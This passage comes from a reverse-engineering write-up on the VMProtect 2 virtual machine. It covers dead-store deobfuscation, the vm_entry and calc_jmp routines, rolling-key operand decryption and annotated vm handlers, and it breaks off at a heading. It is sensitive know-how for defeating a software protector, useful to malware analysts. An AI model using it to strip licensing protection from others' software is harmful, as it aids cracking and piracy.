.vmp0:0000000140004166 66 41 C1 E1 0B shl r9w, 0Bh
.vmp0:000000014000416B 5A pop rdx
.vmp0:000000014000416C 66 81 F9 EB D2 cmp cx, 0D2EBh
.vmp0:0000000140004171 48 0F A3 F1 bt rcx, rsi
.vmp0:0000000140004175 41 59 pop r9
.vmp0:0000000140004177 66 41 21 E2 and r10w, sp
.vmp0:000000014000417B 41 C1 D2 10 rcl r10d, 10h
.vmp0:000000014000417F 41 5A pop r10
.vmp0:0000000140004181 66 0F BA F9 0C btc cx, 0Ch
.vmp0:0000000140004186 49 0F CC bswap r12
.vmp0:0000000140004189 48 3D 97 74 7D C7 cmp rax, 0FFFFFFFFC77D7497h
.vmp0:000000014000418F 41 5C pop r12
.vmp0:0000000140004191 66 D3 C1 rol cx, cl
.vmp0:0000000140004194 F5 cmc
.vmp0:0000000140004195 66 0F BA F5 01 btr bp, 1
.vmp0:000000014000419A 66 41 D3 FE sar r14w, cl
.vmp0:000000014000419E 5D pop rbp
.vmp0:000000014000419F 66 41 29 F6 sub r14w, si
.vmp0:00000001400041A3 66 09 F6 or si, si
.vmp0:00000001400041A6 01 C6 add esi, eax
.vmp0:00000001400041A8 66 0F C1 CE xadd si, cx
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041AD 0F 9F C1 setnle cl
.vmp0:00000001400041B0 0F 9E C1 setle cl
.vmp0:00000001400041B3 4C 0F BE F0 movsx r14, al
.vmp0:00000001400041B7 59 pop rcx
.vmp0:00000001400041B8 F7 D1 not ecx
.vmp0:00000001400041BA 59 pop rcx
.vmp0:00000001400041BB 4C 8D A8 ED 19 28 C9 lea r13, [rax-36D7E613h]
.vmp0:00000001400041C2 66 F7 D6 not si
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041CD 66 F7 D6 not si
.vmp0:00000001400041D0 66 44 0F BE EA movsx r13w, dl
.vmp0:00000001400041D5 41 BD B2 6B 48 B7 mov r13d, 0B7486BB2h
.vmp0:00000001400041DB 5E pop rsi
.vmp0:00000001400041DC 66 41 BD CA 44 mov r13w, 44CAh
.vmp0:0000000140007AEA 4C 8D AB 31 11 63 14 lea r13, [rbx+14631131h]
.vmp0:0000000140007AF1 41 0F CD bswap r13d
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
Let’s start from the top, one instruction at a time. The first instruction at 0x140004149 is “RCL — Rotate Left Carry”. This instruction affects the FLAGS register as well as DI. Lets see the next time DI is referenced. Is it a read or a write? The next reference to DI is the NOT instruction at 0x140004158. NOT reads and writes DI, so far both instructions are valid. The next instruction that references DI is the POP instructions. This is critical as all write’s to RDI prior to this POP can be removed from the instruction stream.

.vmp0:000000014000414C 58 pop rax
.vmp0:000000014000414D 66 41 0F A4 DB 01 shld r11w, bx, 1
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:000000014000415B 5F pop rdi
The next instruction is POP RAX at 0x14000414C. RAX is never written too throughout the entire instruction stream it is only read from. Since it has a read dependency this instruction cannot be removed. Moving onto the next instruction, SHLD — double precision shift left, a write dependency on R11, read dependency on BX. The next instruction that references R11 is the POP R11 at 0x140004153. We can remove the SHLD instruction as its deadstore.

.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:0000000140004155 80 E6 CA and dh, 0CAh
.vmp0:000000014000415B 5F pop rdi
Now just repeat the process for every single instruction. The end result should look something like this:

.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:000000014000415B 5F pop rdi
.vmp0:0000000140004162 41 58 pop r8
.vmp0:000000014000416B 5A pop rdx
.vmp0:0000000140004175 41 59 pop r9
.vmp0:000000014000417F 41 5A pop r10
.vmp0:000000014000418F 41 5C pop r12
.vmp0:000000014000419E 5D pop rbp
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041B7 59 pop rcx
.vmp0:00000001400041B7 59 pop rcx
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041DB 5E pop rsi
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
This method is not perfect for removing deadstore obfuscation as there is a second POP RCX which is missing from this result above. POP and PUSH instructions are special cases which should not be emitted from the instruction stream as these instructions also change RSP. This method for removing deadstore is also only applied to vm_entry and vm handlers. This cannot be applied to generically obfuscated routines as-is. Again, this method is NOT going to work on any obfuscated routine, it’s specifically tailored for vm_entry and vm handlers as these routines have no legitimate JCC’s in them.

Overview — VMProtect 2 Virtual Machine
Virtual instructions are decrypted and interpreted by virtual instruction handlers referred to as “vm handlers”. The virtual machine is a RISC based stack machine with scratch registers. Prior to vm-entries an encrypted RVA (relative virtual address) to virtual instructions is pushed onto the stack and all general purpose registers as well as flags are pushed onto the stack. The VIP is decrypted, calculated, and loaded into RSI. A rolling decryption key is then started in RBX and is used to decrypt every single operand of every single virtual instruction. The rolling decryption key is updated by transforming it with the decrypted operand value.

Rolling Decryption
VMProtect 2 uses a rolling decryption key. This key is used to decrypt virtual instruction operands, which subsequently prevents any sort of hooking, as if any virtual instructions are executed out of order the rolling decryption key will become invalid causing further decryption of virtual operands to be invalid.

Native Register Usage
During execution inside of the virtual machine, some natiive registers are dedicated for the virtual machine mechanisms such as the virtual instruction pointer and virtual stack. In this section I will be discussing these native registers and their uses for the virtual machine.

Non-Volatile Registers — Registers With Specific Usage
To begin, RSI is always used for the virtual instruction pointer. Operands are fetched from the address stored in RSI. The initial value loaded into RSI is done by vm_entry.

RBP is used for the virtual stack pointer, the address stored in RBP is actually the native stack memory. RBP is loaded with RSP prior to allocation of scratch registers. This brings us to RDI which contains scratch registers. The address in RDI is initialized as well in vm_entry and is set to an address landing inside of the native stack.

R12 is loaded with the linear virtual address of the vm handler table. This is done inside of vm_entry and throughout the entire duration of execution inside of the virtual machine R12 will contain this address.

R13 is loaded with the linear virtual address of the module base address inside of vm_entry and is not altered throughout execution inside of the virtual machine.

RBX is a very special register which contains the rolling decryption key. After every decryption of every operand of every virtual instruction RBX is updated by applying a transformation to it with the decrypted operand’s value.

Volatile Registers — Temp Registers
RAX, RCX, and RDX are used as temporary registers inside of the virtual machine, however RAX is used for very specific temporary operations over the other registers. RAX is used to decrypt operands of virtual instructions, AL specifically is used when decrypting the opcode of a virtual instruction.

vm_entry — Entering The Virtual Machine
vm_entry is a very significant component to the virtual machine architecture. Prior to entering the VM, an encrypted RVA to virtual instructions is pushed onto the stack. This RVA is a four byte value.

.vmp0:000000014000822C 68 FA 01 00 89 push 0FFFFFFFF890001FAh
After this value is pushed onto the stack, a jmp is then executed to start executing vm_entry. vm_entry is subjected to obfuscation which I explained in great detail above. By flattening and then removing deadstore code we can get a nice clean view of vm_entry.

0x822c : push 0xFFFFFFFF890001FA
0x7fc9 : push 0x45D3BF1F
0x48e4 : push r13
0x4690 : push rsi
0x4e53 : push r14
0x74fb : push rcx
0x607c : push rsp
0x4926 : pushfq
0x4dc2 : push rbp
0x5c8c : push r12
0x52ac : push r10
0x51a5 : push r9
0x5189 : push rdx
0x7d5f : push r8
0x4505 : push rdi
0x4745 : push r11
0x478b : push rax
0x7a53 : push rbx
0x500d : push r15
0x6030 : push [0x00000000000018E2]
0x593a : mov rax, 0x7FF634270000
0x5955 : mov r13, rax
0x5965 : push rax
0x596f : mov esi, [rsp+0xA0]
0x5979 : not esi
0x5985 : neg esi
0x598d : ror esi, 0x1A
0x599e : mov rbp, rsp
0x59a8 : sub rsp, 0x140
0x59b5 : and rsp, 0xFFFFFFFFFFFFFFF0
0x59c1 : mov rdi, rsp
0x59cb : lea r12, [0x0000000000000AA8]
0x59df : mov rax, 0x100000000
0x59ec : add rsi, rax
0x59f3 : mov rbx, rsi
0x59fa : add rsi, [rbp]
0x5a05 : mov al, [rsi]
0x5a0a : xor al, bl
0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
0x5a2f : xor bl, al
0x5a34 : movzx rax, al
0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
0x5507 : inc rsi
0x7951 : add rdx, r13
0x7954 : jmp rdx
As expected all registers as well as RFLAGS is pushed to the stack. The last push puts eight bytes of zeros on the stack, not a relocation which I first expected. The ordering in which these pushes happen are unique per-build, however the last push of eight zero’s is always the same throughout all binaries. This is a very stable signature to determine when the end of general register pushes is done. Below are the exact sequences of instructions I am referring to in this paragraph.

0x48e4 : push r13
0x4690 : push rsi
0x4e53 : push r14
0x74fb : push rcx
0x607c : push rsp
0x4926 : pushfq
0x4dc2 : push rbp
0x5c8c : push r12
0x52ac : push r10
0x51a5 : push r9
0x5189 : push rdx
0x7d5f : push r8
0x4505 : push rdi
0x4745 : push r11
0x478b : push rax
0x7a53 : push rbx
0x500d : push r15
0x6030 : push [0x00000000000018E2] ; pushes 0’s
After all registers and RFLAGS is pushed onto the stack the base address of the module is loaded into R13. This happens in every single binary, R13 always contains the base address of the module during execution of the VM. The base address of the module is also pushed onto the stack.

0x593a : mov rax, 0x7FF634270000
0x5955 : mov r13, rax
0x5965 : push rax
Next, the relative virtual address of the desired virtual instructions to be executed is decrypted. This is done by loading the 32bit RVA into ESI from RSP+0xA0. This is a very significant signature and can be found trivially. Three transformations are then applied to ESI to get the decrypted RVA of the virtual instructions. The three transformations are unique per-binary. However, there are always three transformations.

0x596f : mov esi, [rsp+0xA0]
0x5979 : not esi
0x5985 : neg esi
0x598d : ror esi, 0x1A
Furthermore, the next notable operation that occurs is space allocated on the stack for scratch registers. RSP is always moved to RBP always, then RSP is subtracted by 0x140. Then aligned by 16 bytes. After this is done the address is moved into RDI. During the execution of the VM RDI always contains a pointer to scratch registers.

0x599e : mov rbp, rsp
0x59a8 : sub rsp, 0x140
0x59b5 : and rsp, 0xFFFFFFFFFFFFFFF0
0x59c1 : mov rdi, rsp
The next notable operation is loading the address of the vm handler table into R12. This is done on every single VMProtect 2 binary. R12 always contains the linear virtual address of the vm handler table. This is yet another significant signature which can be used to find the location of the vm handler table quite trivially.

0x59cb : lea r12, [0x0000000000000AA8]
Another operation is then done on RSI to calculate VIP. Inside of the PE headers, there is a header called the “optional header”. This contains an assortment of information. One of the fields is called “ImageBase”. If there are any bits above 32 in this field those bits are then added to RSI. For example, vmptest.vmp.exe ImageBase field contains the value 0x140000000. Thus 0x100000000 is added to RSI as part of the calculation. If an ImageBase field contains less than a 32 bit value zero is added to RSI.

0x59df : mov rax, 0x100000000
0x59ec : add rsi, rax
After this addition is done to RSI, a small and somewhat insignificant instruction is executed. This instruction loads the linear virtual address of the virtual instructions into RBX. Now, RBX has a very special purpose, it contains the “rolling decryption” key. As you can see, the first value loaded into RBX is going to be the address of the virtual instructions themselves! Not the linear virtual address but just the RVA including the top 32bits of the ImageBase field.

0x59f3 : mov rbx, rsi
Next, the base address of the vmp module is added to RSI computing the full, linear virtual address of the virtual instructions. Remember that RBP contains the address of RSP prior to the allocation of scratch space. The base address of the module is on the top of the stack at this point.

0x59fa : add rsi, [rbp]
This concludes the details for vm_entry, the next part of this routine is actually referred to as “calc_vm_handler” and is executed after every single virtual instruction besides the vm_exit instruction.

calc_jmp — Decryption Of Vm Handler Index
calc_jmp is part of the vm_entry routine, however it’s referred to by more than just the vm_entry routine. Every single vm handler will eventually jump to calc_jmp (besides vm_exit). This snippet of code is responsible for decrypting the opcode of every virtual instruction as well as indexing into the vm handler table, decrypting the vm handler table entry and jumping to the resulting vm handler.

0x5a05 : mov al, [rsi]
0x5a0a : xor al, bl
0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
0x5a2f : xor bl, al
0x5a34 : movzx rax, al
0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
0x5507 : inc rsi
0x7951 : add rdx, r13
0x7954 : jmp rdx
The first instruction of this snippet of code reads a single byte out of RSI which as you know is VIP. This byte is an encrypted opcode. In other words it’s an encrypted index into the vm handler table. There are 5 total transformations which are done. The first transformation is always applied to the encrypted opcode and the value in RBX as the source. This is the “rolling encryption” at play. It’s important to note that the first value loaded into RBX is the RVA to the virtual instructions. Thus BL will contain the last byte of this RVA.

0x5a05 : mov al, [rsi]
0x5a2f : xor bl, al ; transformation is unique to each build
Next, three transformations are applied to AL directly. These transformations can have immediate values, however there is never another register’s value added into these transformations.

0x5a11 : neg al
0x5a19 : rol al, 0x05
0x5a26 : inc al
The last transformation is applied to the rolling encryption key stored in RBX. This transformation is the same transformation as the first. However the registers swap places. The end result is the decrypted vm handler index. The value of AL is then zero extended to the rest of RAX.

0x5a2f : xor bl, al
0x5a34 : movzx rax, al
Now that the index into the vm handler table has been decrypted the vm handler entry itself must be fetched and decrypted. There is only a single transformation applied to these vm handler table entries. No register values are ever used in these transformations. The register in which the encrypted vm table entry value is loaded into is always RCX or RDX.

0x5a41 : mov rdx, [r12+rax*8]
0x5a49 : xor rdx, 0x7F3D2149
VIP is now advanced. VIP can be advanced either forward or backwards and the advancement operation itself can be an LEA, INC, DEC, ADD, or SUB instruction.

0x5507 : inc rsi
Lastly, the base address of the module is added to the decrypted vm handler RVA and a JMP is then executed to start executing this vm handler routine. Again RDX or RCX is always used for this ADD and JMP. This is another significant signature in the virtual machine.

0x7951 : add rdx, r13
0x7954 : jmp rdx
This concludes the calc_jmp code snippet specifications. As you can see there are some very significant signatures which can be found trivially using Zydis. Especially the decryption done on vm handler table entries, and fetching these encrypted values.

vm_exit — Leaving The Virtual Machine
Unlike vm_entry, vm_exit is quite a straightforward routine. This routine simply POP’s all registers back into place including RFLAGS. There are some redundant POP’s which are used to clear the module base, padding, as well as RSP off of the stack since they are not needed. The order in which the pops occur are the inverse of the order in which they are pushed onto the stack by vm_entry. The return address is calculated and loaded onto the stack prior to the vm_exit routine.

.vmp0:000000014000635F 48 89 EC mov rsp, rbp
.vmp0:0000000140006371 58 pop rax ; pop module base of the stack
.vmp0:000000014000637F 5B pop rbx ; pop zero’s off the stack
.vmp0:0000000140006387 41 5F pop r15
.vmp0:0000000140006393 5B pop rbx
.vmp0:000000014000414C 58 pop rax
.vmp0:0000000140004153 41 5B pop r11
.vmp0:000000014000415B 5F pop rdi
.vmp0:0000000140004162 41 58 pop r8
.vmp0:000000014000416B 5A pop rdx
.vmp0:0000000140004175 41 59 pop r9
.vmp0:000000014000417F 41 5A pop r10
.vmp0:000000014000418F 41 5C pop r12
.vmp0:000000014000419E 5D pop rbp
.vmp0:00000001400041AC 9D popfq
.vmp0:00000001400041B7 59 pop rcx ; pop RSP off the stack.
.vmp0:00000001400041BA 59 pop rcx
.vmp0:00000001400041CB 41 5E pop r14
.vmp0:00000001400041DB 5E pop rsi
.vmp0:0000000140007AF4 41 5D pop r13
.vmp0:0000000140007AF6 C3 retn
check_vsp — relocate scratch registers
Vm handlers which put any new values on the stack will have a stack check after the vm handler executes. This routine checks to see if the stack is encroaching upon the scratch registers.

.vmp0:00000001400044AA 48 8D 87 E0 00 00 00 lea rax, [rdi+0E0h]
.vmp0:00000001400044B2 48 39 C5 cmp rbp, rax
.vmp0:000000014000429D 0F 87 5B 17 00 00 ja calc_jmp
.vmp0:00000001400042AC 48 89 E2 mov rdx, rsp
.vmp0:0000000140005E5F 48 8D 8F C0 00 00 00 lea rcx, [rdi+0C0h]
.vmp0:0000000140005E75 48 29 D1 sub rcx, rdx
.vmp0:000000014000464C 48 8D 45 80 lea rax, [rbp-80h]
.vmp0:0000000140004655 24 F0 and al, 0F0h
.vmp0:000000014000465F 48 29 C8 sub rax, rcx
.vmp0:000000014000466B 48 89 C4 mov rsp, rax
.vmp0:0000000140004672 9C pushfq
.vmp0:000000014000467C 56 push rsi
.vmp0:0000000140004685 48 89 D6 mov rsi, rdx
.vmp0:00000001400057D6 48 8D BC 01 40 FF FF FF lea rdi, [rcx+rax-0C0h]
.vmp0:00000001400051FC 57 push rdi
.vmp0:000000014000520C 48 89 C7 mov rdi, rax
.vmp0:0000000140004A34 F3 A4 rep movsb
.vmp0:0000000140004A3E 5F pop rdi
.vmp0:0000000140004A42 5E pop rsi
.vmp0:0000000140004A48 9D popfq
.vmp0:0000000140004A49 E9 B0 0F 00 00 jmp calc_jmp
Note the usage of “movsb” which is used to copy the contents of the scratch registers.

Virtual Instructions — Opcodes, Operands, Specifications
Virtual instructions consist of two or more operands. The first operand being the opcode of the virtual instruction. Opcodes are 8bit, unsigned values which when decrypted are the index into the vm handler table. There can be a second operand which is a one to eight byte immediate value.

All operands are encrypted and must be decrypted with the rolling decrypt key. Decryption is done inside of calc_jmp as well as vm handlers themselves. Vm handlers that do decryption will be operating on immediate values only and not an opcode.

Operand Decryption — Transformations
VMProtect 2 encrypts its virtual instructions using a rolling decryption key. This key is located in RBX and is initially set to the address of the virtual instructions. The transformations done to decrypt operands consist of XOR, NEG, NOT, AND, ROR, ROL, SHL, SHR, ADD, SUB, INC, DEC, and BSWAP. When an operand is decrypted the first transformation applied to the operand includes the rolling decryption key. Thus only XOR, AND, ROR, ROL, ADD, and SUB are going to be the first transformation applied to the operand. Then, there are always three transformations directly applied to the operand. At this stage, the operand is completely decrypted and the value in RAX will hold the decrypted operand value. Lastly the rolling decryption key is updated by transforming the rolling decryption key with the fully decrypted operand value. An example looks like this:

.vmp0:0000000140005A0A 30 D8 xor al, bl ; decrypt using rolling key…
.vmp0:0000000140005A11 F6 D8 neg al ; 1/3 transformations…
.vmp0:0000000140005A19 C0 C0 05 rol al, 5 ; 2/3 transformations…
.vmp0:0000000140005A26 FE C0 inc al 3/3 transformations…
.vmp0:0000000140005A2F 30 C3 xor bl, al ; update rolling key…
This above snippet of code decrypts the first operand, which is always the instructions opcode. This code is part of the calc_jmp routine, however the transformation format is the same for any second operands.

VM Handlers — Specifications
VM handlers contain the native code to execute virtual instructions. Every VMProtect 2 binary has a vm handler table which is an array of 256 QWORD’s. Each entry contains an encrypted relative virtual address to the corresponding VM handler. There are many variants of virtual instructions such as different sizes of immediate values as well as sign and zero extended values. This section will go over a few virtual instruction examples as well as some key information which must be noted when trying to parse VM handlers.

VM handlers which handle immediate values fetch the encrypted immediate value from RSI. The traditional five transformations are then applied to this encrypted immediate value. The transformation format follows the same as the calc_jmp transformations. The first transformation is applied to the encrypted immediate value with the rolling decryption key being the source of the operation. Then three transformations are applied directly to the encrypted immediate value, this decrypts the value fully. Lastly the rolling decryption key is updated by doing the first transformation except with the destination and source operands swapped.

.vmp0:00000001400076D2 48 8B 06 mov rax, [rsi] ; fetch immediate value…
.vmp0:00000001400076D9 48 31 D8 xor rax, rbx ; rolling key transformation…
.vmp0:00000001400076DE 48 C1 C0 1D rol rax, 1Dh ; 1/3 transformations…
.vmp0:0000000140007700 48 0F C8 bswap rax ; 2/3 transformations…
.vmp0:000000014000770F 48 C1 C0 30 rol rax, 30h ; 3/3 transformations…
.vmp0:0000000140007714 48 31 C3 xor rbx, rax ; update rolling key…
Also note that vm handlers are subjected to opaque branching as well as deadstore obfuscation.

LCONST — Load Constant Value Onto Stack
One of the most iconic virtual machine instructions is LCONST. This virtual instruction loads a constant value from the second operand of a virtual instruction onto the stack.

LCONSTQ — Load Constant QWORD
This is the deobfuscated view of LCONSTQ VM handler. As you can see this VM handler reads the second operand of the virtual instruction out of VIP (RSI). It then decrypts this immediate value and advances VIP. The decrypted immediate value is then put onto the VSP.

mov rax, [rsi]
xor rax, rbx ; transformation
bswap rax ; transformation
lea rsi, [rsi+8] ; advance VIP…
rol rax, 0Ch ; transformation
inc rax ; transformation
xor rbx, rax ; transformation (update rolling decrypt key)
sub rbp, 8
mov [rbp+0], rax
LCONSTCDQE — Load Constant DWORD Sign Extended to a QWORD
This virtual instruction loads a DWORD size operand from RSI, decrypts it, and extends it to a QWORD, finally putting it on the virtual stack.

mov eax, [rsi]
xor eax, ebx
xor eax, 32B63802h
dec eax
lea rsi, [rsi+4] ; advance VIP
xor eax, 7E4087EEh

; look below for details on this…
push rbx
xor [rsp], eax
pop rbx

cdqe ; sign extend EAX to RAX…
sub rbp, 8
mov [rbp+0], rax
Note, this last vm handler updates the rolling decryption key by putting the value on the stack then applying the transformation. This is something that could cause significant problems when parsing these VM handlers. Luckily there is a very simple trick to handle this, always remember that the transformation applied to the rolling key is the same transformation as the first. In the above case it’s a simple XOR.

LCONSTCBW — Load Constant Byte Convert To Word
LCONSTCBW loads a constant byte value from RSI, decrypts it, and zero extends the result as a WORD value. This decrypted value is then placed upon the virtual stack.

movzx eax, byte ptr [rsi]
add al, bl
inc al
neg al
ror al, 0x06
add bl, al
mov ax, [rax+rdi*1]
sub rbp, 0x02
inc rsi
mov [rbp], ax
LCONSTCWDE — Load Constant Word Convert To DWORD
LCONSTCWDE loads a constant word from RSI, decrypts it, and sign extends it to a DWORD. Lastly the resulting value is placed upon the virtual stack.

mov ax, [rsi]
add rsi, 0x02
xor ax, bx
rol ax, 0x0E
xor ax, 0xA808
neg ax
xor bx, ax
cwde
sub rbp, 0x04
mov [rbp], eax
LCONSTDW — Load Constant DWORD
LCONSTDW loads a constant dword from RSI, decrypts it, and lastly places the result upon the virtual stack. Also note that VIP advances backwards in the example below. You can see this in the operand fetch as its subtracting from RSI prior to a dereference.

mov eax, [rsi-0x04]
bswap eax
add eax, ebx
dec eax
neg eax
xor eax, 0x2FFD187C
push rbx
add [rsp], eax
pop rbx
sub rbp, 0x04
mov [rbp], eax
add rsi, 0xFFFFFFFFFFFFFFFC
LREG — Load Scratch Register Value Onto Stack
Let’s look at another VM handler, this one by the name of LREG. Just like LCONST there are many variants of this instruction, especially for different sizes. LREG is also going to be in every single binary as it’s used inside of the VM to load register values into scratch registers. More on this later.

LREGQ — Load Scratch Register QWORD
LREGQ has a one byte immediate value. This is the scratch register index. A pointer to scratch registers is always loaded into RDI. As described above many times, there are five total transformations applied to the immediate value to decrypt it. The first transformation is applied from the rolling decryption key, followed by three transformations applied directly to the immediate value which fully decrypts it. Lastly the rolling decryption key is updated by applying the first transformation on it with the decrypted immediate value as the source.

mov al, [rsi]
sub al, bl
ror al, 2
not al
inc al
sub bl, al
mov rdx, [rax+rdi]
sub rbp, 8
mov [rbp+0], rdx
inc rsi
LREGDW — Load Scratch Register DWORD
LREGDW is a variant of LREG which loads a DWORD from a scratch register onto the stack. It has two operands, the second being a single byte representing the scratch register index. The snippet of code below is a deobfuscated view of LREGDW.

mov al, [rsi]
sub al, bl
add al, 97h
ror al, 1
neg al
sub bl, al
mov edx, [rax+rdi]
sub rbp, 4
mov [rbp+0], edx
SREG — Set Scratch Register Value
Another iconic virtual instruction which is in every single binary is SREG. There are many variants to this instruction which set scratch registers to certain sizes values. This virtual instruction has two operands, the second being a single byte immediate value containing the scratch register index.

SREGQ — Set Scratch Register Value QWORD
SREGQ sets a virtual scratch register with a QWORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi]
sub al, bl
ror al, 2
not al
inc al
sub bl, al
mov rdx, [rbp+0]
add rbp, 8
mov [rax+rdi], rdx
SREGDW — Set Scratch Register Value DWORD
SREGDW sets a virtual scratch register with a DWORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi-0x01]
xor al, bl
inc al
ror al, 0x02
add al, 0xDE
xor bl, al
lea rsi, [rsi-0x01]
mov dx, [rbp]
add rbp, 0x02
mov [rax+rdi*1], dx
SREGW — Set Scratch Register Value WORD
SREGW sets a virtual scratch register with a WORD value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

movzx eax, byte ptr [rsi-0x01]
sub al, bl
ror al, 0x06
neg al
rol al, 0x02
sub bl, al
mov edx, [rbp]
add rbp, 0x04
dec rsi
mov [rax+rdi*1], edx
SREGB — Set Scratch Register Value Byte
SREGB sets a virtual scratch register with a BYTE value from on top of the virtual stack. This virtual instruction consists of two operands, the second being a single byte representing the virtual scratch register.

mov al, [rsi-0x01]
xor al, bl
not al
xor al, 0x10
neg al
xor bl, al
sub rsi, 0x01
mov dx, [rbp]
add rbp, 0x02
mov [rax+rdi*1], dl
ADD — Add Two Values
The virtual ADD instruction adds two values on the stack together and stores the result in the second value position on the stack. RFLAGS is then pushed onto the stack as the ADD instruction alters RFLAGS.

ADDQ — Add Two QWORD Values
ADDQ adds two QWORD values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov rax, [rbp+0]
add [rbp+8], rax
pushfq
pop qword ptr [rbp+0]
ADDW — Add Two WORDS Values
ADDW adds two WORD values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov ax, [rbp]
sub rbp, 0x06
add [rbp+0x08], ax
pushfq
pop [rbp]
ADDB — Add Two Bytes Values
ADDB adds two BYTE values stored on top of the virtual stack. RFLAGS is also pushed onto the stack as the native ADD instruction alters flags.

mov al, [rbp]
sub rbp, 0x06
add [rbp+0x08], al
pushfq
pop [rbp]
MUL — Unsigned Multiplication
The virtual MUL instruction multiples two values stored on the stack together. These vm handlers use the native MUL instruction, additionally RFLAGS is pushed onto the stack. Lastly, it is a single operand instruction which means there is no immediate value associated with this instruction.

MULQ — Unsigned Multiplication of QWORD’s
MULQ multiples two QWORD values together, the result is stored on the stack at VSP+24, additionally RFLAGS is pushed onto the stack.

mov rax, [rbp+0x08]
sub rbp, 0x08
mul rdx
mov [rbp+0x08], rdx
mov [rbp+0x10], rax
pushfq
pop [rbp]
DIV — Unsigned Division
The virtual DIV instruction uses the native DIV instruction, the top operands used in division are located on top of the virtual stack. This is a single operand virtual instruction thus there is no immediate value. RFLAGS is also pushed onto the stack as the native DIV instruction can also RFLAGS.

DIVQ — Unsigned Division Of QWORD’s
DIVQ divides two QWORD values located on the virtual stack. Push RFLAGS onto the stack.

mov rdx, [rbp]
mov rax, [rbp+0x08]
div [rbp+0x10]
mov [rbp+0x08], rdx
mov [rbp+0x10], rax
pushfq
pop [rbp]
READ — Read Memory
The READ instruction reads memory of different sizes. There is a variant of this instruction to read one, two, four, and eight bytes.

READQ — Read QWORD
READQ reads a QWORD value from the address stored on top of the stack. This virtual instruction seems to sometimes have a segment prepended to it. However not all READQ vm handlers have this ss associated with it. The QWORD value is now stored on top of the virtual stack.

mov rax, [rbp]
mov rax, ss:[rax]
mov [rbp], rax
READDW — Read DWORD
READDW reads a DWORD value from the address stored on top of the virtual stack. The DWORD value is then put on top of the virtual stack. Below are two examples of READDW, one which uses this segment index syntax and the other without it.

mov rax, [rbp]
add rbp, 0x04
mov eax, [rax]
mov [rbp], eax
Note the segment offset usage below with ss…

mov rax, [rbp]
add rbp, 0x04
mov eax, ss:[rax]
mov [rbp], eax
READW — Read Word
READW reads a WORD value from the address stored on top of the virtual stack. The WORD value is then put on top of the virtual stack. Below is an example of this vm handler using a segment index syntax however keep in mind there are vm handlers without this segment index.

mov rax, [rbp]
add rbp, 0x06
mov ax, ss:[rax]
mov [rbp], ax
WRITE — Write Memory
The WRITE virtual instruction writes up to eight bytes to an address. There are four variants of this virtual instruction, one for each power of two up to and including eight. There are also versions of each vm handler which use a segment offset type instruction encoding. However in longmode some segment base addresses are zero. The segment that seems to always be used is the SS segment which has the base of zero thus the segment base has no effect here, it simply makes it a little more difficult to parse these vm handlers.

WRITEQ — Write Memory QWORD
WRITEQ writes a QWORD value to the address located on top of the virtual stack. The stack is incremented by 16 bytes.

.vmp0:0000000140005A74 48 8B 45 00 mov rax, [rbp+0]
.vmp0:0000000140005A82 48 8B 55 08 mov rdx, [rbp+8]
.vmp0:0000000140005A8A 48 83 C5 10 add rbp, 10h
.vmp0:00000001400075CF 48 89 10 mov [rax], rdx
WRITEDW — Write DWORD
WRITEDW writes a DWORD value to the address located on top of the virtual stack. The stack is incremented by 12 bytes.

mov rax, [rbp]
mov edx, [rbp+0x08]
add rbp, 0x0C
mov [rax], edx
Note the segment offset ss usage below…

mov rax, [rbp]
mov edx, [rbp+0x08]
add rbp, 0x0C
mov ss:[rax], edx ; note the SS usage here…
WRITEW — Write WORD
The WRITEW virtual instruction writes a WORD value to the address located on top of the virtual stack. The stack is then incremented by ten bytes.

mov rax, [rbp]
mov dx, [rbp+0x08]
add rbp, 0x0A
mov ss:[rax], dx
WRITEB — Write Byte
The WRITEB virtual instruction writes a BYTE value to the address located on top of the virtual stack. The stack is then incremented by ten bytes.

mov rax, [rbp]
mov dl, [rbp+0x08]
add rbp, 0x0A
mov ss:[rax], dl
SHL — Shift Left
The SHL vm handler shifts a value located on top of the stack to the left by a number of bits. The number of bits to shift is stored above the value to be shifted on the stack. The result is then put onto the stack as well as RFLAGS.

SHLCBW — Shift Left Convert Result To WORD
SHLCBW shifts a byte value to the left and zero extends the result to a WORD. RFLAGS is pushed onto the stack.

mov al, [rbp+0]
mov cl, [rbp+2]
sub rbp, 6
shl al, cl
mov [rbp+8], ax
pushfq
pop qword ptr [rbp+0]
SHLW — Shift Left WORD
SHLW shifts a WORD value to the left. RFLAGS is pushed onto the virtual stack.

mov ax, [rbp]
mov cl, [rbp+0x02]
sub rbp, 0x06
shl ax, cl
mov [rbp+0x08], ax
pushfq
pop [rbp]
SHLDW — Shift Left DWORD
SHLDW shifts a DWORD to the left. RFLAGS is pushed onto the virtual stack.

mov eax, [rbp]
mov cl, [rbp+0x04]
sub rbp, 0x06
shl eax, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
SHLQ — Shift Left QWORD
SHLQ shifts a QWORD to the left. RFLAGS is pushed onto the virtual stack.

mov rax, [rbp]
mov cl, [rbp+0x08]
sub rbp, 0x06
shl rax, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHLD — Shift Left Double Precision
